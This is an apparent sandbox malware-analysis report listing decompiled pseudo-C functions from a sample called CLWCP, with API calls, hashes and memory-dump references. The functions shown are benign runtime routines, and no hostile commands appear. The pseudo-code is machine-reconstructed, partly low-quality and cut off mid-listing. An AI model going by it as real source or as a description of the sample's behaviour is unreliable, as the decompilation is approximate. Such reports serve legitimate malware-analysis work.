                                  • API String ID: 1473721057-2916730932
                                  • Opcode ID: a0590573830a7f80b8913dbc9a3df36a76268db15375c0b7bcb7968f84f741bf
                                  • Instruction ID: a4c5bda5b7be060efb6ec09bf4f15de92f611fd847c32c520330e0d7c33438b4
                                  • Opcode Fuzzy Hash: a0590573830a7f80b8913dbc9a3df36a76268db15375c0b7bcb7968f84f741bf
                                  • Instruction Fuzzy Hash: 11F0F4607081144AE7307B3BC8845A632A49F813187100C3BF0467B2D3CB3EDC66926F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041083C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0041083C() {
				intOrPtr _t14;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr* _t19;
				intOrPtr* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(0x4108dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t23;
				 *0x470820 =  *0x470820 - 1;
				if( *0x470820 < 0) {
					E00410344();
					 *0x470810 = E0040E94C;
					 *0x470814 = E0040E574;
					 *0x470818 = E0040E484;
					 *0x47081c = E0040E574;
					_t16 =  *0x46fbe4; // 0x46e00c
					 *_t16 = E0040EC4C;
					_t17 =  *0x46f9ec; // 0x46e010
					 *_t17 = 0x410038;
					_t18 =  *0x46fc54; // 0x46e014
					 *_t18 = E0040EF60;
					_t19 =  *0x46fd84; // 0x46e018
					 *_t19 = E0040F294;
					_t20 =  *0x46fc70; // 0x46e01c
					 *_t20 = E0040F9B4;
					_push(0x470828);
					L0040629C();
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(E004108E4);
				return 0;
			}










                                  0x00410841
                                  0x00410842
                                  0x00410847
                                  0x0041084a
                                  0x0041084d
                                  0x00410854
                                  0x0041085b
                                  0x00410865
                                  0x0041086f
                                  0x00410879
                                  0x0041087f
                                  0x00410889
                                  0x0041088f
                                  0x00410896
                                  0x0041089c
                                  0x004108a3
                                  0x004108a9
                                  0x004108b0
                                  0x004108b6
                                  0x004108bd
                                  0x004108c3
                                  0x004108c5
                                  0x004108ca
                                  0x004108ca
                                  0x004108d1
                                  0x004108d4
                                  0x004108d7
                                  0x00000000

                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(Function_00070828,00000000,004108DD), ref: 004108CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalInitializeSection
                                  • String ID: L@$t@$t@
                                  • API String ID: 32694325-3831199040
                                  • Opcode ID: c015cd4b3715ff4d082952e1dc0e30eb8708b1a76d25eafca8bdff324460320d
                                  • Instruction ID: a22d123eaa6a32eb848eddf597e543a16d6253bfbf2f768ce15951058fc2f4b5
                                  • Opcode Fuzzy Hash: c015cd4b3715ff4d082952e1dc0e30eb8708b1a76d25eafca8bdff324460320d
                                  • Instruction Fuzzy Hash: 41015AB4205204DFD341EF29E901A117BE4FB4A300361C97BE848DB760E7B99899CBDE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040CBF4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040CBF4() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x46e130 = _t1;
				}
				if( *0x46e130 == 0) {
					 *0x46e130 = E00408864;
					return E00408864;
				}
				return _t1;
			}





                                  0x0040cbfa
                                  0x0040cbff
                                  0x0040cc03
                                  0x0040cc0b
                                  0x0040cc10
                                  0x0040cc10
                                  0x0040cc1c
                                  0x0040cc23
                                  0x00000000
                                  0x0040cc23
                                  0x0040cc29

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040D681,00000000,0040D694), ref: 0040CBFA
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040CC0B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  • Opcode ID: 158cd66c8eb784ac48e0921195b6bfa71039512138e4a5419e043a5900f66fac
                                  • Instruction ID: c68ccd131e8ffc2f062f45f8866e767524613671bbdd6fcf588f7d79a5374073
                                  • Opcode Fuzzy Hash: 158cd66c8eb784ac48e0921195b6bfa71039512138e4a5419e043a5900f66fac
                                  • Instruction Fuzzy Hash: 6AD05E75648340CEF700BBF2ECC160A21C4A351704F000E3FE4457A2C2F7BC4810961D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004329A0, Relevance: 6.2, APIs: 4, Instructions: 207COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E004329A0(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr* _t61;
				intOrPtr* _t63;
				struct HICON__* _t66;
				intOrPtr _t68;
				intOrPtr* _t73;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				struct HWND__* _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t99;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t108;
				struct HWND__* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				intOrPtr _t119;
				char _t120;
				intOrPtr _t121;
				void* _t135;
				intOrPtr _t139;
				intOrPtr _t144;
				intOrPtr* _t159;
				void* _t162;
				void* _t169;
				void* _t170;

				_t159 = __eax;
				if( *0x470adc != 0) {
					L3:
					_t50 =  *0x470abc; // 0x0
					_t51 =  *0x470abc; // 0x0
					_t119 = E00432874(_t159,  *(_t51 + 0x9b) & 0x000000ff,  &_v28, _t50);
					if( *0x470adc == 0) {
						_t172 =  *0x470ae0;
						if( *0x470ae0 != 0) {
							_t108 =  *0x470ad0; // 0x0
							_t109 = GetDesktopWindow();
							_t110 =  *0x470ae0; // 0x0
							E0043D55C(_t110, _t109, _t172, _t108);
						}
					}
					_t54 =  *0x470abc; // 0x0
					if( *((char*)(_t54 + 0x9b)) != 0) {
						__eflags =  *0x470adc;
						_t6 =  &_v24;
						 *_t6 =  *0x470adc != 0;
						__eflags =  *_t6;
						 *0x470adc = 2;
					} else {
						 *0x470adc = 1;
						_v24 = 0;
					}
					_t55 =  *0x470ac0; // 0x0
					if(_t119 ==  *((intOrPtr*)(_t55 + 8))) {
						L12:
						_t56 =  *0x470ac0; // 0x0
						 *((intOrPtr*)(_t56 + 0x10)) =  *_t159;
						 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t159 + 4));
						_t57 =  *0x470ac0; // 0x0
						if( *((intOrPtr*)(_t57 + 8)) != 0) {
							_t99 =  *0x470ac0; // 0x0
							E004346D0( *((intOrPtr*)(_t99 + 8)),  &_v20, _t159);
							_t102 =  *0x470ac0; // 0x0
							 *((intOrPtr*)(_t102 + 0x18)) = _v20;
							 *((intOrPtr*)(_t102 + 0x1c)) = _v16;
						}
						_t135 = E004328C4(2);
						_t61 =  *0x470ac0; // 0x0
						_t162 =  *((intOrPtr*)( *_t61 + 4))( *((intOrPtr*)(_t159 + 4)));
						if( *0x470ae0 == 0) {
							L22:
							_t63 =  *0x46fda0; // 0x470b44
							_t66 = SetCursor(E00453F84( *_t63, _t162));
							if( *0x470adc != 2) {
								goto L33;
							}
							_t184 = _t119;
							if(_t119 != 0) {
								_t120 = E00432900();
								_t68 =  *0x470ac0; // 0x0
								 *((intOrPtr*)(_t68 + 0x60)) = _t120;
								__eflags = _t120;
								if(__eflags != 0) {
									E004346D0(_t120,  &_v24, _t159);
									_t66 = E00403594(_t120, __eflags);
									_t139 =  *0x470ac0; // 0x0
									 *(_t139 + 0x5c) = _t66;
								} else {
									_t79 =  *0x470ac0; // 0x0
									_t66 = E00403594( *((intOrPtr*)(_t79 + 8)), __eflags);
									_t144 =  *0x470ac0; // 0x0
									 *(_t144 + 0x5c) = _t66;
								}
							} else {
								_push( *((intOrPtr*)(_t159 + 4)));
								_t81 =  *0x470ac0; // 0x0
								_t66 = E00403594( *((intOrPtr*)(_t81 + 0x40)), _t184);
							}
							if( *0x470ac0 == 0) {
								goto L33;
							} else {
								_t121 =  *0x470ac0; // 0x0
								_t42 = _t121 + 0x64; // 0x64
								_t43 = _t121 + 0x4c; // 0x4c
								_t66 = E00407D98(_t43, 0x10, _t42);
								if(_t66 != 0) {
									goto L33;
								}
								if(_v28 != 0) {
									_t76 =  *0x470ac0; // 0x0
									 *((intOrPtr*)( *_t76 + 0x34))();
								}
								_t73 =  *0x470ac0; // 0x0
								 *((intOrPtr*)( *_t73 + 0x30))();
								_t75 =  *0x470ac0; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t75;
							}
						} else {
							if(_t119 == 0 || ( *(_t119 + 0x51) & 0x00000020) != 0) {
								L18:
								_t83 =  *0x470ae0; // 0x0
								E0043D538(_t83, _t162);
								_t85 =  *0x470ae0; // 0x0
								_t182 =  *((char*)(_t85 + 0x6a));
								if( *((char*)(_t85 + 0x6a)) != 0) {
									_t86 =  *0x470ae0; // 0x0
									E0043D658(_t86,  *((intOrPtr*)(_t159 + 4)),  *_t159, __eflags);
								} else {
									_t89 = GetDesktopWindow();
									_t90 =  *0x470ae0; // 0x0
									E0043D55C(_t90, _t89, _t182,  *((intOrPtr*)(_t159 + 4)));
								}
								goto L22;
							} else {
								_t92 =  *0x470ac0; // 0x0
								if( *((char*)(_t92 + 4)) == 0) {
									_t93 =  *0x470ae0; // 0x0
									E0043D6CC(_t93, _t135, __eflags);
									_t95 =  *0x46fda0; // 0x470b44
									SetCursor(E00453F84( *_t95, _t162));
									goto L22;
								}
								goto L18;
							}
						}
					} else {
						_t66 = E004328C4(1);
						if( *0x470ac0 == 0) {
							L33:
							return _t66;
						}
						_t104 =  *0x470ac0; // 0x0
						 *((intOrPtr*)(_t104 + 8)) = _t119;
						_t105 =  *0x470ac0; // 0x0
						 *((intOrPtr*)(_t105 + 0xc)) = _v28;
						_t106 =  *0x470ac0; // 0x0
						 *((intOrPtr*)(_t106 + 0x10)) =  *_t159;
						 *((intOrPtr*)(_t106 + 0x14)) =  *((intOrPtr*)(_t159 + 4));
						_t66 = E004328C4(0);
						if( *0x470ac0 == 0) {
							goto L33;
						}
						goto L12;
					}
				}
				_t112 =  *0x470acc; // 0x0
				asm("cdq");
				_t169 = (_t112 -  *__eax ^ __edx) - __edx -  *0x470ad8; // 0x0
				if(_t169 >= 0) {
					goto L3;
				}
				_t116 =  *0x470ad0; // 0x0
				asm("cdq");
				_t66 = (_t116 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t170 = _t66 -  *0x470ad8; // 0x0
				if(_t170 < 0) {
					goto L33;
				}
				goto L3;
			}


















































                                  0x004329a6
                                  0x004329af
                                  0x004329de
                                  0x004329de
                                  0x004329e4
                                  0x004329fb
                                  0x00432a04
                                  0x00432a06
                                  0x00432a0d
                                  0x00432a0f
                                  0x00432a15
                                  0x00432a22
                                  0x00432a27
                                  0x00432a27
                                  0x00432a0d
                                  0x00432a2c
                                  0x00432a38
                                  0x00432a48
                                  0x00432a4f
                                  0x00432a4f
                                  0x00432a4f
                                  0x00432a54
                                  0x00432a3a
                                  0x00432a3a
                                  0x00432a41
                                  0x00432a41
                                  0x00432a5b
                                  0x00432a63
                                  0x00432ab0
                                  0x00432ab0
                                  0x00432ab7
                                  0x00432abd
                                  0x00432ac0
                                  0x00432ac9
                                  0x00432ad1
                                  0x00432ad9
                                  0x00432ade
                                  0x00432ae7
                                  0x00432aee
                                  0x00432aee
                                  0x00432afc
                                  0x00432b00
                                  0x00432b0a
                                  0x00432b13
                                  0x00432b8a
                                  0x00432b8d
                                  0x00432b9a
                                  0x00432ba6
                                  0x00000000
                                  0x00000000
                                  0x00432bac
                                  0x00432bae
                                  0x00432bcf
                                  0x00432bd1
                                  0x00432bd6
                                  0x00432bd9
                                  0x00432bdb
                                  0x00432c09
                                  0x00432c18
                                  0x00432c1d
                                  0x00432c23
                                  0x00432bdd
                                  0x00432be5
                                  0x00432bf1
                                  0x00432bf6
                                  0x00432bfc
                                  0x00432bfc
                                  0x00432bb0
                                  0x00432bb3
                                  0x00432bb6
                                  0x00432bc3
                                  0x00432bc3
                                  0x00432c2d
                                  0x00000000
                                  0x00432c2f
                                  0x00432c2f
                                  0x00432c35
                                  0x00432c38
                                  0x00432c40
                                  0x00432c47
                                  0x00000000
                                  0x00000000
                                  0x00432c4e
                                  0x00432c50
                                  0x00432c57
                                  0x00432c57
                                  0x00432c5a
                                  0x00432c61
                                  0x00432c64
                                  0x00432c6f
                                  0x00432c70
                                  0x00432c71
                                  0x00432c72
                                  0x00000000
                                  0x00432c72
                                  0x00432b15
                                  0x00432b17
                                  0x00432b2a
                                  0x00432b2c
                                  0x00432b31
                                  0x00432b36
                                  0x00432b3b
                                  0x00432b3f
                                  0x00432b5f
                                  0x00432b64
                                  0x00432b41
                                  0x00432b45
                                  0x00432b4e
                                  0x00432b53
                                  0x00432b53
                                  0x00000000
                                  0x00432b1f
                                  0x00432b1f
                                  0x00432b28
                                  0x00432b6b
                                  0x00432b70
                                  0x00432b78
                                  0x00432b85
                                  0x00000000
                                  0x00432b85
                                  0x00000000
                                  0x00432b28
                                  0x00432b17
                                  0x00432a65
                                  0x00432a67
                                  0x00432a73
                                  0x00432c79
                                  0x00432c79
                                  0x00432c79
                                  0x00432a79
                                  0x00432a7e
                                  0x00432a81
                                  0x00432a89
                                  0x00432a8c
                                  0x00432a93
                                  0x00432a99
                                  0x00432a9e
                                  0x00432aaa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00432aaa
                                  0x00432a63
                                  0x004329b1
                                  0x004329b8
                                  0x004329bd
                                  0x004329c3
                                  0x00000000
                                  0x00000000
                                  0x004329c5
                                  0x004329cd
                                  0x004329d0
                                  0x004329d2
                                  0x004329d8
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 00432A15
                                  • GetDesktopWindow.USER32 ref: 00432B45
                                  • SetCursor.USER32(00000000), ref: 00432B9A
                                    • Part of subcall function 0043D6CC: 73451770.COMCTL32(00000000,?,00432B75), ref: 0043D6E8
                                  • SetCursor.USER32(00000000), ref: 00432B85
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CursorDesktopWindow$73451770
                                  • String ID:
                                  • API String ID: 1277058964-0
                                  • Opcode ID: 9bf921f9aa4056971e9bfa9237737fb84cd97ee4621af0c44d1d2d3d36ef77e5
                                  • Instruction ID: 4df4feac2710ae1df8f4326747be23c6cf5b3c1064a22c5f7127f32f540e700e
                                  • Opcode Fuzzy Hash: 9bf921f9aa4056971e9bfa9237737fb84cd97ee4621af0c44d1d2d3d36ef77e5
                                  • Instruction Fuzzy Hash: 9E915D74602341CFC704DF29D984E16B7E1BBA9304F09917AE449CB7A6C7B8EC85CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EA40, Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040EA40(signed short* __eax) {
				char _v260;
				char _v768;
				char _v772;
				signed short* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if((_v776[0] & 0x00000020) == 0) {
					E0040E90C(0x80070057);
				}
				_t43 =  *_v776 & 0x0000ffff;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 = _v776[4];
					} else {
						_v780 =  *(_v776[4]);
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040DB1C();
							E0040E90C(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040DB24();
							E0040E90C(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040E9E4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040E9B4(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040DB2C();
						E0040E90C(_v780);
						E0040EC38(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040D6B4();
				return E0040E90C(_v776);
			}






















                                  0x0040ea4c
                                  0x0040ea5c
                                  0x0040ea63
                                  0x0040ea63
                                  0x0040ea6e
                                  0x0040ea7c
                                  0x0040ea8b
                                  0x0040eaa9
                                  0x0040ea8d
                                  0x0040ea98
                                  0x0040ea98
                                  0x0040eab8
                                  0x0040eac4
                                  0x0040eac7
                                  0x0040eac9
                                  0x0040eaca
                                  0x0040eacc
                                  0x0040ead2
                                  0x0040ead4
                                  0x0040eae3
                                  0x0040eae4
                                  0x0040eaee
                                  0x0040eaef
                                  0x0040eaf4
                                  0x0040eaff
                                  0x0040eb00
                                  0x0040eb0a
                                  0x0040eb0b
                                  0x0040eb10
                                  0x0040eb2b
                                  0x0040eb2d
                                  0x0040eb2e
                                  0x0040eb31
                                  0x0040eb31
                                  0x0040ead2
                                  0x0040eb3a
                                  0x0040eb3d
                                  0x0040eb3f
                                  0x0040eb40
                                  0x0040eb46
                                  0x0040eb4c
                                  0x0040eb4e
                                  0x0040eb50
                                  0x0040eb53
                                  0x0040eb56
                                  0x0040eb56
                                  0x0040eb59
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040eb59
                                  0x0040eb59
                                  0x0040eb60
                                  0x0040eb6b
                                  0x0040eb73
                                  0x0040eb7a
                                  0x0040eb81
                                  0x0040eb82
                                  0x0040eb87
                                  0x0040eb92
                                  0x0040eb92
                                  0x0040eba0
                                  0x0040eba4
                                  0x0040ebaa
                                  0x0040ebab
                                  0x0040ebbb

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040EAEF
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040EB0B
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040EB82
                                  • VariantClear.OLEAUT32(?), ref: 0040EBAB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                  • String ID:
                                  • API String ID: 920484758-0
                                  • Opcode ID: 7abf1dbe01bfa80357a0a9f37415d43e99f2e6b632d8c353a54639f2791cf5fd
                                  • Instruction ID: 98a03a7dcd9f33bcf1f3be098a2c0c533de45232fa85f0bc8e653439391d6fff
                                  • Opcode Fuzzy Hash: 7abf1dbe01bfa80357a0a9f37415d43e99f2e6b632d8c353a54639f2791cf5fd
                                  • Instruction Fuzzy Hash: 2F413F75A0121D8FCB61DB5ACC80BD9B3BCAF48304F0045EAE549F7252DA38AF908F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B5E0, Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B5E0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x470664; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040B5D4(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040893C( &_v273, 0x104, E0040C5E8( &_v534, 0x5c) + 1);
				_t74 = 0x40b760;
				_t86 = 0x40b760;
				_t83 =  *0x40703c; // 0x407088
				if(E00403524(_t87, _t83) != 0) {
					_t74 = E004045DC( *((intOrPtr*)(_t87 + 4)));
					_t69 = E004088D8(_t74, 0x40b760);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40b764;
					}
				}
				_t51 =  *0x46fd8c; // 0x406dbc
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x470664; // 0x400000
				LoadStringA(E004051B8(_t53),  *_t16,  &_v790, 0x100);
				E004032E8( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00408F34(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E004088D8(_v8, _t86);
			}































                                  0x0040b5e0
                                  0x0040b5ec
                                  0x0040b5ef
                                  0x0040b5f1
                                  0x0040b5fd
                                  0x0040b60c
                                  0x0040b636
                                  0x0040b63c
                                  0x0040b648
                                  0x0040b64d
                                  0x0040b653
                                  0x0040b653
                                  0x0040b671
                                  0x0040b676
                                  0x0040b67b
                                  0x0040b682
                                  0x0040b68f
                                  0x0040b699
                                  0x0040b69d
                                  0x0040b6a4
                                  0x0040b6ad
                                  0x0040b6ad
                                  0x0040b6a4
                                  0x0040b6be
                                  0x0040b6c3
                                  0x0040b6c7
                                  0x0040b6d2
                                  0x0040b6df
                                  0x0040b6ea
                                  0x0040b6f0
                                  0x0040b6fd
                                  0x0040b703
                                  0x0040b70d
                                  0x0040b713
                                  0x0040b71a
                                  0x0040b720
                                  0x0040b727
                                  0x0040b72d
                                  0x0040b749
                                  0x0040b75c

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B5FD
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B621
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B63C
                                  • LoadStringA.USER32 ref: 0040B6D2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID:
                                  • API String ID: 3990497365-0
                                  • Opcode ID: 53f1b1049f9f335a6b3069db278be823071f03a2bf5a6f8338bb79dce8fee9f3
                                  • Instruction ID: 95334cec29bb1404c72e32e0288f365d396286f3265917a73c8ce31bc4caf2e4
                                  • Opcode Fuzzy Hash: 53f1b1049f9f335a6b3069db278be823071f03a2bf5a6f8338bb79dce8fee9f3
                                  • Instruction Fuzzy Hash: BA4131709002589BDB21EB69CD85BDAB7FC9B18304F4040FAA548F7392D7799F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B5DE, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B5DE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x470664; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040B5D4(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040893C( &_v273, 0x104, E0040C5E8( &_v534, 0x5c) + 1);
				_t75 = 0x40b760;
				_t89 = 0x40b760;
				_t85 =  *0x40703c; // 0x407088
				if(E00403524(_t92, _t85) != 0) {
					_t75 = E004045DC( *((intOrPtr*)(_t92 + 4)));
					_t69 = E004088D8(_t75, 0x40b760);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40b764;
					}
				}
				_t51 =  *0x46fd8c; // 0x406dbc
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x470664; // 0x400000
				LoadStringA(E004051B8(_t53),  *_t16,  &_v790, 0x100);
				E004032E8( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00408F34(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E004088D8(_v8, _t89);
			}































                                  0x0040b5ec
                                  0x0040b5ef
                                  0x0040b5f1
                                  0x0040b5fd
                                  0x0040b60c
                                  0x0040b636
                                  0x0040b63c
                                  0x0040b648
                                  0x0040b64d
                                  0x0040b653
                                  0x0040b653
                                  0x0040b671
                                  0x0040b676
                                  0x0040b67b
                                  0x0040b682
                                  0x0040b68f
                                  0x0040b699
                                  0x0040b69d
                                  0x0040b6a4
                                  0x0040b6ad
                                  0x0040b6ad
                                  0x0040b6a4
                                  0x0040b6be
                                  0x0040b6c3
                                  0x0040b6c7
                                  0x0040b6d2
                                  0x0040b6df
